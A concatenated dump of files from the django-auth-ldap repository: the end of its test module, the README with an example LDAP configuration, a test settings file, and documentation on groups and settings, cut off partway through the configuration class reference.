@spy_ldap(\"simple_bind_s\")\n def test_permit_null_password(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", PERMIT_EMPTY_PASSWORD=True\n )\n\n alice = authenticate(username=\"alice\", password=None)\n\n self.assertIsNone(alice)\n mock.assert_called_once()\n\n def test_pickle(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice0 = authenticate(username=\"alice\", password=\"password\")\n\n pickled = pickle.dumps(alice0, pickle.HIGHEST_PROTOCOL)\n alice = pickle.loads(pickled)\n\n self.assertIsNotNone(alice)\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertEqual(\n backend.get_all_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(alice, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(alice, \"auth\"), True)\n\n @mock.patch(\"ldap.ldapobject.SimpleLDAPObject.search_s\")\n def test_search_attrlist(self, mock_search):\n backend = get_backend()\n connection = backend.ldap.initialize(self.server.ldap_uri, bytes_mode=False)\n search = LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=alice)\", [\"*\", \"+\"]\n )\n search.execute(connection)\n mock_search.assert_called_once_with(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=alice)\", [\"*\", \"+\"]\n )\n\n def test_override_authenticate_access_ldap_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n class MyBackend(LDAPBackend):\n def authenticate_ldap_user(self, ldap_user, password):\n ldap_user.foo = \"bar\"\n return super().authenticate_ldap_user(ldap_user, password)\n\n backend = MyBackend()\n user = backend.authenticate(None, username=\"alice\", password=\"password\")\n self.assertEqual(user.ldap_user.foo, \"bar\")\n\n @spy_ldap(\"search_s\")\n def test_dn_not_cached(self, mock):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n for _ in range(2):\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIsNotNone(user)\n # Should have executed once per auth.\n self.assertEqual(mock.call_count, 2)\n # DN is not cached.\n self.assertIsNone(cache.get(\"django_auth_ldap.user_dn.alice\"))\n\n @spy_ldap(\"search_s\")\n def test_dn_cached(self, mock):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n CACHE_TIMEOUT=60,\n )\n for _ in range(2):\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIsNotNone(user)\n # Should have executed only once.\n self.assertEqual(mock.call_count, 1)\n # DN is cached.\n self.assertEqual(\n cache.get(\"django_auth_ldap.user_dn.alice\"), \"uid=alice,ou=people,o=test\"\n )\n\n #\n # Utilities\n #\n\n def _init_settings(self, **kwargs):\n kwargs.setdefault(\"SERVER_URI\", self.server.ldap_uri)\n settings = {}\n for key, value in kwargs.items():\n settings[\"AUTH_LDAP_%s\" % key] = value\n cm = override_settings(**settings)\n cm.enable()\n self.addCleanup(cm.disable)\n\n def _init_groups(self):\n permissions = [\n Permission.objects.get(codename=\"add_user\"),\n Permission.objects.get(codename=\"change_user\"),\n ]\n\n active_gon = Group.objects.create(name=\"active_gon\")\n active_gon.permissions.add(*permissions)\n\n active_px = Group.objects.create(name=\"active_px\")\n active_px.permissions.add(*permissions)\n\n active_nis = Group.objects.create(name=\"active_nis\")\n active_nis.permissions.add(*permissions)\n" }, { "alpha_fraction": 0.6952398419380188, "alphanum_fraction": 0.6965165138244629, "avg_line_length": 33.484275817871094, "blob_id": "ac71310cb980133367e80eecdb168188a9b8c348", "content_id": "d96ad14f848e03f4e9d46a619b445b97e3fd7533", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5483, "license_type": "permissive", "max_line_length": 94, "num_lines": 159, "path": "/README.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "================================\nDjango Authentication Using LDAP\n================================\n\n.. image:: https://readthedocs.org/projects/django-auth-ldap/badge/?version=latest\n :target: https://django-auth-ldap.readthedocs.io/en/latest/\n\n.. image:: https://img.shields.io/pypi/v/django-auth-ldap.svg\n :target: https://pypi.org/project/django-auth-ldap/\n\n.. image:: https://github.com/django-auth-ldap/django-auth-ldap/workflows/Test/badge.svg\n :target: https://github.com/django-auth-ldap/django-auth-ldap/workflows/Test/badge.svg\n\n.. image:: https://img.shields.io/pypi/l/django-auth-ldap.svg\n :target: https://raw.githubusercontent.com/django-auth-ldap/django-auth-ldap/master/LICENSE\n\nThis is a Django authentication backend that authenticates against an LDAP\nservice. Configuration can be as simple as a single distinguished name\ntemplate, but there are many rich configuration options for working with users,\ngroups, and permissions.\n\n* Documentation: https://django-auth-ldap.readthedocs.io/\n* PyPI: https://pypi.org/project/django-auth-ldap/\n* Repository: https://github.com/django-auth-ldap/django-auth-ldap\n* License: BSD 2-Clause\n\n.. _`python-ldap`: https://pypi.org/project/python-ldap/\n\n\nInstallation\n============\n\nInstall the package with pip:\n\n.. code-block:: sh\n\n $ pip install django-auth-ldap\n\nIt requires `python-ldap`_ >= 3.1. You'll need the `OpenLDAP`_ libraries and\nheaders available on your system.\n\nTo use the auth backend in a Django project, add\n``'django_auth_ldap.backend.LDAPBackend'`` to ``AUTHENTICATION_BACKENDS``. Do\nnot add anything to ``INSTALLED_APPS``.\n\n.. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\n 'django_auth_ldap.backend.LDAPBackend',\n ]\n\n``LDAPBackend`` should work with custom user models, but it does assume that a\ndatabase is present.\n\n.. note::\n\n ``LDAPBackend`` does not inherit from ``ModelBackend``. It is possible to\n use ``LDAPBackend`` exclusively by configuring it to draw group membership\n from the LDAP server. However, if you would like to assign permissions to\n individual users or add users to groups within Django, you'll need to have\n both backends installed:\n\n .. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\n 'django_auth_ldap.backend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n ]\n\n.. _`OpenLDAP`: https://www.openldap.org/\n\n\nExample Configuration\n=====================\n\nHere is a complete example configuration from ``settings.py`` that exercises\nnearly all of the features. In this example, we're authenticating against a\nglobal pool of users in the directory, but we have a special area set aside for\nDjango groups (``ou=django,ou=groups,dc=example,dc=com``). Remember that most\nof this is optional if you just need simple authentication. Some default\nsettings and arguments are included for completeness.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, GroupOfNamesType\n\n\n # Baseline configuration.\n AUTH_LDAP_SERVER_URI = 'ldap://ldap.example.com'\n\n AUTH_LDAP_BIND_DN = 'cn=django-agent,dc=example,dc=com'\n AUTH_LDAP_BIND_PASSWORD = 'phlebotinum'\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n 'ou=users,dc=example,dc=com',\n ldap.SCOPE_SUBTREE,\n '(uid=%(user)s)',\n )\n # Or:\n # AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=users,dc=example,dc=com'\n\n # Set up the basic group parameters.\n AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n 'ou=django,ou=groups,dc=example,dc=com',\n ldap.SCOPE_SUBTREE,\n '(objectClass=groupOfNames)',\n )\n AUTH_LDAP_GROUP_TYPE = GroupOfNamesType(name_attr='cn')\n\n # Simple group restrictions\n AUTH_LDAP_REQUIRE_GROUP = 'cn=enabled,ou=django,ou=groups,dc=example,dc=com'\n AUTH_LDAP_DENY_GROUP = 'cn=disabled,ou=django,ou=groups,dc=example,dc=com'\n\n # Populate the Django user from the LDAP directory.\n AUTH_LDAP_USER_ATTR_MAP = {\n 'first_name': 'givenName',\n 'last_name': 'sn',\n 'email': 'mail',\n }\n\n AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n 'is_active': 'cn=active,ou=django,ou=groups,dc=example,dc=com',\n 'is_staff': 'cn=staff,ou=django,ou=groups,dc=example,dc=com',\n 'is_superuser': 'cn=superuser,ou=django,ou=groups,dc=example,dc=com',\n }\n\n # This is the default, but I like to be explicit.\n AUTH_LDAP_ALWAYS_UPDATE_USER = True\n\n # Use LDAP group membership to calculate group permissions.\n AUTH_LDAP_FIND_GROUP_PERMS = True\n\n # Cache distinguished names and group memberships for an hour to minimize\n # LDAP traffic.\n AUTH_LDAP_CACHE_TIMEOUT = 3600\n\n # Keep ModelBackend around for per-user permissions and maybe a local\n # superuser.\n AUTHENTICATION_BACKENDS = (\n 'django_auth_ldap.backend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n )\n\n\nContributing\n============\n\nIf you'd like to contribute, the best approach is to send a well-formed pull\nrequest, complete with tests and documentation. Pull requests should be\nfocused: trying to do more than one thing in a single request will make it more\ndifficult to process.\n\nIf you have a bug or feature request you can try `logging an issue`_.\n\nThere's no harm in creating an issue and then submitting a pull request to\nresolve it. This can be a good way to start a conversation and can serve as an\nanchor point.\n\n.. _`logging an issue`: https://github.com/django-auth-ldap/django-auth-ldap/issues\n" }, { "alpha_fraction": 0.7285223603248596, "alphanum_fraction": 0.7319587469100952, "avg_line_length": 35.375, "blob_id": "6820547ea0429414c07c9e0c418bb079e3c4bc7c", "content_id": "a629b61d2bc5b13f6acf0aac69e3dee79374286d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "permissive", "max_line_length": 80, "num_lines": 8, "path": "/tests/settings.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "SECRET_KEY = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\"\n\nINSTALLED_APPS = (\"django.contrib.auth\", \"django.contrib.contenttypes\", \"tests\")\n\nDATABASES = {\"default\": {\"ENGINE\": \"django.db.backends.sqlite3\"}}\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\n\nAUTHENTICATION_BACKENDS = [\"django_auth_ldap.backend.LDAPBackend\"]\n" }, { "alpha_fraction": 0.7507061958312988, "alphanum_fraction": 0.7507061958312988, "avg_line_length": 43.715789794921875, "blob_id": "d6411121fbcba2bddcc02639ab71f175348fb24c", "content_id": "e47bb3e9b5f9ce859f5b1fa3796e108167e01e1f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4248, "license_type": "permissive", "max_line_length": 87, "num_lines": 95, "path": "/docs/groups.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Working With Groups\n===================\n\nTypes of Groups\n---------------\n\nWorking with groups in LDAP can be a tricky business, mostly because there are\nso many different kinds. This module includes an extensible API for working with\nany kind of group and includes implementations for the most common ones.\n:class:`~django_auth_ldap.config.LDAPGroupType` is a base class whose concrete\nsubclasses can determine group membership for particular grouping mechanisms.\nFour built-in subclasses cover most grouping mechanisms:\n\n * :class:`~django_auth_ldap.config.PosixGroupType`\n * :class:`~django_auth_ldap.config.MemberDNGroupType`\n * :class:`~django_auth_ldap.config.NestedMemberDNGroupType`\n\nposixGroup and nisNetgroup objects are somewhat specialized, so they get their\nown classes. The other two cover mechanisms whereby a group object stores a list\nof its members as distinguished names. This includes groupOfNames,\ngroupOfUniqueNames, and Active Directory groups, among others. The nested\nvariant allows groups to contain other groups, to as many levels as you like.\nFor convenience and readability, several trivial subclasses of the above are\nprovided:\n\n * :class:`~django_auth_ldap.config.GroupOfNamesType`\n * :class:`~django_auth_ldap.config.NestedGroupOfNamesType`\n * :class:`~django_auth_ldap.config.GroupOfUniqueNamesType`\n * :class:`~django_auth_ldap.config.NestedGroupOfUniqueNamesType`\n * :class:`~django_auth_ldap.config.ActiveDirectoryGroupType`\n * :class:`~django_auth_ldap.config.NestedActiveDirectoryGroupType`\n * :class:`~django_auth_ldap.config.OrganizationalRoleGroupType`\n * :class:`~django_auth_ldap.config.NestedOrganizationalRoleGroupType`\n\n\nFinding Groups\n--------------\n\nTo get started, you'll need to provide some basic information about your LDAP\ngroups. :setting:`AUTH_LDAP_GROUP_SEARCH` is an\n:class:`~django_auth_ldap.config.LDAPSearch` object that identifies the set of\nrelevant group objects. That is, all groups that users might belong to as well\nas any others that we might need to know about (in the case of nested groups,\nfor example). :setting:`AUTH_LDAP_GROUP_TYPE` is an instance of the class\ncorresponding to the type of group that will be returned by\n:setting:`AUTH_LDAP_GROUP_SEARCH`. All groups referenced elsewhere in the\nconfiguration must be of this type and part of the search results.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, GroupOfNamesType\n\n AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n \"ou=groups,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n )\n AUTH_LDAP_GROUP_TYPE = GroupOfNamesType()\n\n\n.. _limiting-access:\n\nLimiting Access\n---------------\n\nThe simplest use of groups is to limit the users who are allowed to log in. If\n:setting:`AUTH_LDAP_REQUIRE_GROUP` is set, then only users who are members of\nthat group will successfully authenticate. :setting:`AUTH_LDAP_DENY_GROUP` is\nthe reverse: if given, members of this group will be rejected.\n\n.. code-block:: python\n\n AUTH_LDAP_REQUIRE_GROUP = \"cn=enabled,ou=groups,dc=example,dc=com\"\n AUTH_LDAP_DENY_GROUP = \"cn=disabled,ou=groups,dc=example,dc=com\"\n\nHowever, these two settings alone may not be enough to satisfy your needs. In\nsuch cases, you can use the :class:`~django_auth_ldap.config.LDAPGroupQuery`\nobject to perform more complex matches against a user's groups. For example:\n\n.. code-block:: python\n\n from django_auth_ldap.config import LDAPGroupQuery\n\n AUTH_LDAP_REQUIRE_GROUP = (\n LDAPGroupQuery(\"cn=enabled,ou=groups,dc=example,dc=com\")\n | LDAPGroupQuery(\"cn=also_enabled,ou=groups,dc=example,dc=com\")\n ) & ~LDAPGroupQuery(\"cn=disabled,ou=groups,dc=example,dc=com\")\n\nIt is important to note a couple features of the example above. First and foremost,\nthis handles the case of both `AUTH_LDAP_REQUIRE_GROUP` and `AUTH_LDAP_DENY_GROUP`\nin one setting. Second, you can use three operators on these queries: ``&``, ``|``,\nand ``~``: ``and``, ``or``, and ``not``, respectively.\n\nWhen groups are configured, you can always get the list of a user's groups from\n``user.ldap_user.group_dns`` or ``user.ldap_user.group_names``. More advanced\nuses of groups are covered in the next two sections.\n" }, { "alpha_fraction": 0.6998145580291748, "alphanum_fraction": 0.7001854181289673, "avg_line_length": 31.387388229370117, "blob_id": "eeebbf7e1bcd40729757fde90acc1d69dae4d264", "content_id": "a989a152b75fe0c2314a6c1a02c14c0621c3a858", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 21570, "license_type": "permissive", "max_line_length": 98, "num_lines": 666, "path": "/docs/reference.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Reference\n=========\n\nSettings\n--------\n\n.. setting:: AUTH_LDAP_ALWAYS_UPDATE_USER\n\nAUTH_LDAP_ALWAYS_UPDATE_USER\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``True``\n\nIf ``True``, the fields of a :class:`~django.contrib.auth.models.User` object\nwill be updated with the latest values from the LDAP directory every time the\nuser logs in. Otherwise the :class:`~django.contrib.auth.models.User` object\nwill only be populated when it is automatically created.\n\n\n.. setting:: AUTH_LDAP_AUTHORIZE_ALL_USERS\n\nAUTH_LDAP_AUTHORIZE_ALL_USERS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, :class:`~django_auth_ldap.backend.LDAPBackend` will be able furnish\npermissions for any Django user, regardless of which backend authenticated it.\n\n\n.. setting:: AUTH_LDAP_BIND_AS_AUTHENTICATING_USER\n\nAUTH_LDAP_BIND_AS_AUTHENTICATING_USER\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, authentication will leave the LDAP connection bound as the\nauthenticating user, rather than forcing it to re-bind with the default\ncredentials after authentication succeeds. This may be desirable if you do not\nhave global credentials that are able to access the user's attributes.\ndjango-auth-ldap never stores the user's password, so this only applies to\nrequests where the user is authenticated. Thus, the downside to this setting is\nthat LDAP results may vary based on whether the user was authenticated earlier\nin the Django view, which could be surprising to code not directly concerned\nwith authentication.\nRemember to set :setting:`AUTH_LDAP_USER_DN_TEMPLATE` to avoid initial connection\nto LDAP with default bind credentials.\n\n\n.. setting:: AUTH_LDAP_REFRESH_DN_ON_BIND\n\nAUTH_LDAP_REFRESH_DN_ON_BIND\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True`` and :setting:`AUTH_LDAP_BIND_AS_AUTHENTICATING_USER` is ``True`` and\n:setting:`AUTH_LDAP_USER_DN_TEMPLATE` is set, after performing bind login it refresh\nthe DN attribute of the user. This is meant for such cases in which users authenticates\nvia `userPrincipalName` and in which `distinguishedName` is not inferrable by that\nattribute.\n\n\n.. setting:: AUTH_LDAP_BIND_DN\n\nAUTH_LDAP_BIND_DN\n~~~~~~~~~~~~~~~~~\n\nDefault: ``''`` (Empty string)\n\nThe distinguished name to use when binding to the LDAP server (with\n:setting:`AUTH_LDAP_BIND_PASSWORD`). Use the empty string (the default) for an\nanonymous bind. To authenticate a user, we will bind with that user's DN and\npassword, but for all other LDAP operations, we will be bound as the DN in this\nsetting. For example, if :setting:`AUTH_LDAP_USER_DN_TEMPLATE` is not set, we'll\nuse this to search for the user. If :setting:`AUTH_LDAP_FIND_GROUP_PERMS` is\n``True``, we'll also use it to determine group membership.\n\n\n.. setting:: AUTH_LDAP_BIND_PASSWORD\n\nAUTH_LDAP_BIND_PASSWORD\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``''`` (Empty string)\n\nThe password to use with :setting:`AUTH_LDAP_BIND_DN`.\n\n\n.. setting:: AUTH_LDAP_CACHE_TIMEOUT\n\nAUTH_LDAP_CACHE_TIMEOUT\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``0``\n\nThe value determines the amount of time, in seconds, a user's group memberships\nand distinguished name are cached. The value ``0``, the default, disables\ncaching entirely.\n\n.. setting:: AUTH_LDAP_CONNECTION_OPTIONS\n\nAUTH_LDAP_CONNECTION_OPTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA dictionary of options to pass to each connection to the LDAP server via\n:meth:`LDAPObject.set_option() <ldap.LDAPObject.set_option>`. Keys are\n:ref:`ldap.OPT_* <ldap-options>` constants.\n\n\n.. setting:: AUTH_LDAP_DENY_GROUP\n\nAUTH_LDAP_DENY_GROUP\n~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nThe distinguished name of a group; authentication will fail for any user\nthat belongs to this group.\n\n\n.. setting:: AUTH_LDAP_FIND_GROUP_PERMS\n\nAUTH_LDAP_FIND_GROUP_PERMS\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, :class:`~django_auth_ldap.backend.LDAPBackend` looks up Django\n:class:`~django.contrib.auth.models.Group`\\ s matching LDAP group names, and\nassigns user permissions based on the Django\n:class:`~django.contrib.auth.models.Group` permissions.\n\n:setting:`AUTH_LDAP_GROUP_SEARCH` and :setting:`AUTH_LDAP_GROUP_TYPE` must also\nbe set.\n\n.. important:: Users will not be added to the Django\n :class:`~django.contrib.auth.models.Group`. The LDAP groups remain the\n source of truth for group membership.\n\n.. setting:: AUTH_LDAP_GLOBAL_OPTIONS\n\nAUTH_LDAP_GLOBAL_OPTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA dictionary of options to pass to :func:`ldap.set_option`. Keys are\n:ref:`ldap.OPT_* <ldap-options>` constants.\n\n.. note::\n\n Due to its global nature, this setting ignores the :doc:`settings prefix\n <multiconfig>`. Regardless of how many backends are installed, this setting\n is referenced once by its default name at the time we load the ldap module.\n\n\n.. setting:: AUTH_LDAP_GROUP_SEARCH\n\nAUTH_LDAP_GROUP_SEARCH\n~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nAn :class:`~django_auth_ldap.config.LDAPSearch` object that finds all LDAP\ngroups that users might belong to. If your configuration makes any references to\nLDAP groups, this and :setting:`AUTH_LDAP_GROUP_TYPE` must be set.\n\n\n.. setting:: AUTH_LDAP_GROUP_TYPE\n\nAUTH_LDAP_GROUP_TYPE\n~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nAn :class:`~django_auth_ldap.config.LDAPGroupType` instance describing the type\nof group returned by :setting:`AUTH_LDAP_GROUP_SEARCH`.\n\n\n.. setting:: AUTH_LDAP_MIRROR_GROUPS\n\nAUTH_LDAP_MIRROR_GROUPS\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nIf ``True``, :class:`~django_auth_ldap.backend.LDAPBackend` will mirror a\nuser's LDAP group membership in the Django database. Any time a user\nauthenticates through the :class:`~django_auth_ldap.backend.LDAPBackend`, we\nwill create all of their LDAP groups as Django groups and update their Django\ngroup membership to exactly match their LDAP group membership. If the LDAP\nserver has nested groups, the Django database will end up with a flattened\nrepresentation.\n\nThis can also be a list or other collection of group names, in which case we'll\nonly mirror those groups and leave the rest alone. This is ignored if\n:setting:`AUTH_LDAP_MIRROR_GROUPS_EXCEPT` is set.\n\n.. note:: Users authenticating through another authentication backend, such as\n :class:`~django.contrib.auth.backends.ModelBackend` will **not** have their\n group membership and permissions refreshed from the LDAP server.\n\n\n.. setting:: AUTH_LDAP_MIRROR_GROUPS_EXCEPT\n\nAUTH_LDAP_MIRROR_GROUPS_EXCEPT\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nIf this is not ``None``, it must be a list or other collection of group names.\nThis will enable group mirroring, except that we'll never change the membership\nof the indicated groups. :setting:`AUTH_LDAP_MIRROR_GROUPS` is ignored in this\ncase.\n\n\n.. setting:: AUTH_LDAP_PERMIT_EMPTY_PASSWORD\n\nAUTH_LDAP_PERMIT_EMPTY_PASSWORD\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``False`` (the default), authentication with an empty password will fail\nimmediately, without any LDAP communication. This is a secure default, as some\nLDAP servers are configured to allow binds to succeed with no password, perhaps\nat a reduced level of access. If you need to make use of this LDAP feature, you\ncan change this setting to ``True``.\n\n\n.. setting:: AUTH_LDAP_REQUIRE_GROUP\n\nAUTH_LDAP_REQUIRE_GROUP\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nThe distinguished name of a group; authentication will fail for any user that\ndoes not belong to this group. This can also be an\n:class:`~django_auth_ldap.config.LDAPGroupQuery` instance.\n\n\n.. setting:: AUTH_LDAP_NO_NEW_USERS\n\nAUTH_LDAP_NO_NEW_USERS\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nPrevent the creation of new users during authentication. Any users not already\nin the Django user database will not be able to login.\n\n\n.. setting:: AUTH_LDAP_SERVER_URI\n\nAUTH_LDAP_SERVER_URI\n~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``'ldap://localhost'``\n\nThe URI of the LDAP server. This can be any URI that is supported by your\nunderlying LDAP libraries. Can also be a callable that returns the URI. The\ncallable is passed a single positional argument: ``request``.\n\n.. versionchanged:: 1.7.0\n\n When ``AUTH_LDAP_SERVER_URI`` is set to a callable, it is now passed a\n positional ``request`` argument. Support for no arguments will continue for\n backwards compatibility but will be removed in a future version.\n\n\n.. setting:: AUTH_LDAP_START_TLS\n\nAUTH_LDAP_START_TLS\n~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, each connection to the LDAP server will call\n:meth:`~ldap.LDAPObject.start_tls_s` to enable TLS encryption over the standard\nLDAP port. There are a number of configuration options that can be given to\n:setting:`AUTH_LDAP_GLOBAL_OPTIONS` that affect the TLS connection. For example,\n:data:`ldap.OPT_X_TLS_REQUIRE_CERT` can be set to :data:`ldap.OPT_X_TLS_NEVER`\nto disable certificate verification, perhaps to allow self-signed certificates.\n\n\n.. setting:: AUTH_LDAP_USER_QUERY_FIELD\n\nAUTH_LDAP_USER_QUERY_FIELD\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nThe field on the user model used to query the authenticating user in the\ndatabase. If unset, uses the value of ``USERNAME_FIELD`` of the model class.\nWhen set, the value used to query is obtained through the\n:setting:`AUTH_LDAP_USER_ATTR_MAP`. For example, setting :setting:`AUTH_LDAP_USER_QUERY_FIELD`\nto ``username`` and adding ``\"username\": \"sAMAccountName\",`` to :setting:`AUTH_LDAP_USER_ATTR_MAP`\nwill cause django to query local database using ``username`` column and LDAP using\n``sAMAccountName`` attribute.\n\n\n.. setting:: AUTH_LDAP_USER_ATTRLIST\n\nAUTH_LDAP_USER_ATTRLIST\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nA list of attribute names to load for the authenticated user. Normally, you can\nignore this and the LDAP server will send back all of the attributes of the\ndirectory entry. One reason you might need to override this is to get\noperational attributes, which are not normally included:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_ATTRLIST = [\"*\", \"+\"]\n\n\n.. setting:: AUTH_LDAP_USER_ATTR_MAP\n\nAUTH_LDAP_USER_ATTR_MAP\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA mapping from :class:`~django.contrib.auth.models.User` field names to LDAP\nattribute names. A users's :class:`~django.contrib.auth.models.User` object will\nbe populated from his LDAP attributes at login.\n\n\n.. setting:: AUTH_LDAP_USER_DN_TEMPLATE\n\nAUTH_LDAP_USER_DN_TEMPLATE\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nA string template that describes any user's distinguished name based on the\nusername. This must contain the placeholder ``%(user)s``.\n\n\n.. setting:: AUTH_LDAP_USER_FLAGS_BY_GROUP\n\nAUTH_LDAP_USER_FLAGS_BY_GROUP\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA mapping from boolean :class:`~django.contrib.auth.models.User` field names to\ndistinguished names of LDAP groups. The corresponding field is set to ``True``\nor ``False`` according to whether the user is a member of the group.\n\nValues may be strings for simple group membership tests or\n:class:`~django_auth_ldap.config.LDAPGroupQuery` instances for more complex\ncases.\n\n\n.. setting:: AUTH_LDAP_USER_SEARCH\n\nAUTH_LDAP_USER_SEARCH\n~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nAn :class:`~django_auth_ldap.config.LDAPSearch` object that will locate a user\nin the directory. The filter parameter should contain the placeholder\n``%(user)s`` for the username. It must return exactly one result for\nauthentication to succeed.\n\n\nModule Properties\n-----------------\n\n.. module:: django_auth_ldap\n\n.. data:: version\n\n The library's current version number as a 3-tuple.\n\n.. data:: version_string\n\n The library's current version number as a string.\n\n\nConfiguration\n-------------\n\n.. module:: django_auth_ldap.config\n\n.. class:: LDAPSearch\n\n .. method:: __init__(base_dn, scope, filterstr='(objectClass=*)')\n\n :param str base_dn: The distinguished name of the search base.\n :param int scope: One of ``ldap.SCOPE_*``.\n :param str filterstr: An optional filter string (e.g.\n '(objectClass=person)'). In order to be valid, ``filterstr`` must be\n enclosed in parentheses.\n\n\n.. class:: LDAPSearchUnion\n\n .. versionadded:: 1.1\n\n .. method:: __init__(\\*searches)\n\n :param searches: Zero or more LDAPSearch objects. The result of the\n overall search is the union (by DN) of the results of the underlying\n searches. The precedence of the underlying results and the ordering\n of the final results are both undefined.\n :type searches: :class:`LDAPSearch`\n\n\n.. class:: LDAPGroupType\n\n The base class for objects that will determine group membership for various\n LDAP grouping mechanisms. Implementations are provided for common group\n types or you can write your own. See the source code for subclassing notes.\n\n .. method:: __init__(name_attr='cn')\n\n By default, LDAP groups will be mapped to Django groups by taking the\n first value of the cn attribute. You can specify a different attribute\n with ``name_attr``.\n\n\n.. class:: PosixGroupType\n\n A concrete subclass of :class:`~django_auth_ldap.config.LDAPGroupType` that\n handles the ``posixGroup`` object class. This checks for both primary group\n and group membership.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: MemberDNGroupType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.LDAPGroupType` that handles grouping\n mechanisms wherein the group object contains a list of its member DNs.\n\n .. method:: __init__(member_attr, name_attr='cn')\n\n :param str member_attr: The attribute on the group object that contains\n a list of member DNs. 'member' and 'uniqueMember' are common\n examples.\n\n\n.. class:: NestedMemberDNGroupType\n\n Similar to :class:`~django_auth_ldap.config.MemberDNGroupType`, except this\n allows groups to contain other groups as members. Group hierarchies will be\n traversed to determine membership.\n\n .. method:: __init__(member_attr, name_attr='cn')\n\n As above.\n\n\n.. class:: GroupOfNamesType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles the ``groupOfNames`` object class. Equivalent to\n ``MemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedGroupOfNamesType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles the\n ``groupOfNames`` object class. Equivalent to\n ``NestedMemberDNGroupType('member')``.\n\n 